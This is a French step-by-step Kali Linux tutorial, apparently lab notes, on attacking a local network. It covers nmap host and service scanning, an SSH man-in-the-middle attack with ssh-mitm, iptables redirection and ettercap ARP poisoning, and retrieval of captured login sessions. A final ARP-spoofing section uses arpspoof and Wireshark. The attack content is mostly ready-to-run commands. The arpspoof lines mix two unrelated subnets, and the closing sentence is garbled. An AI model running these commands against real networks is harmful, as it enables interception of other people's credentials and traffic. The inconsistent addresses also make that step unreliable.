Utilisation de Utilisation de Kali
Utilisation de Kali
Découverte des hôtes et services présents sur un réseau local
En tant qu’attaquant, la première étape consiste à recueillir des informations sur le réseau dans lequel nous nous trouvons. Ainsi, à l’aide de l’outil nmap présent sur Kali Linux :
Réaliser un scan du réseau
sudo nmap -sP 192.168.56.0/24
Scanner un hôtes
Afin de savoir quels ports sont ouverts sur ceux-ci et quels services sont proposés
sudo nmap -sV 192.168.56.10
Faire Attaque MITM d’un service SSH
Se déplacer dans le répertoire ssh-mitm
cd ssh-mitm
lancer le service ssh-mitm
sudo ./start.sh
activer le routage
sudo sysctl -w net.ipv4.ip_forward=1
Configurer redirection de ports afin de rediriger tous les flux à destination de la machine attaquante sur le port 22/TCP vers le port 2222 du système Kali Linux
sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 2222
Lancer attaque avec la commande ettercap
sudo ettercap -i eth0 -T -M arp /192.168.56.10// /192.168.56.11//
• -T : lance ettercap en mode texte ; • -M : indique que l'on veut une attaque de type "Man in the middle" ; • 192.168.56.10 (serveur ssh) et 192.168.56.11 (client SSH) sont les adresses IP des victimes
Sur le poste de l’attaquant (Kali), il faut d’arrêter l’attaque ARP Spoofing, taper la touche Q pour arrêter.
arrêter le service ssh-mitm :
sudo ./stop.sh
Aller chercher les information de connexion avec la commande suivante :
sudo nano /home/ssh-mitm/shell_session_0.txt
Faire une Attaque ARP spoofing
Mise en œuvre de l’attaque
Outils à utiliser sur le système attaquant ;
- Wireshark permettant d’analyser les trames transitant par le système attaquant.
- Outil arpspoof permettant d’usurper les communications de couches 2 et 3 (respectivement Ethernet et IPV4). L’installation se fait avec la commande.
Installer le paquet dsniff
sudo apt install dsniff
activer le routage
L’attaquant doit prendre le rôle d’un routeur et doit être paramétré en conséquence. On doit donc positionner le paramètre d’environnement “forwarding” à la valeur “1” avec la commande :
sudo sysctl -w net.ipv4.conf.all.forwarding=1
Vérifier que le paramètre “forwarding” est bien positionné :
sudo sysctl net.ipv4.conf.all.forwarding
la commande doit retourner la valeur 1
Avant l’attaque : Monitorer le trafic transitant via l’attaquant
Avant de lancer l’ARP Spoofing, nous allons vérifier le trafic transitant par l’attaquant en lançant l’analyseur de paquets WireShark :
Sur l’attaquant en mode graphique lancer wireshark en indiquant l’interface d’écoute, dans l’exemple l’interface est « eth0 »:
sudo wireshark -ki eth0
Les commandes à renseigner sur l’attaquant pour l’arpspoofing sont les suivantes :
sudo arpspoof -t 192.168.56.10 192.168.10.254 sudo arpspoof -t 192.168.56.254 192.168.10.10
△ Attention, chaque commande doit être lancée dans une session distincte de l’attaquant, car l’exécution d’un processus peut bloquer la saisie d’une autre commande au sein de la même session.
Maintenant via wiresharp vous voyer toutes les qui transites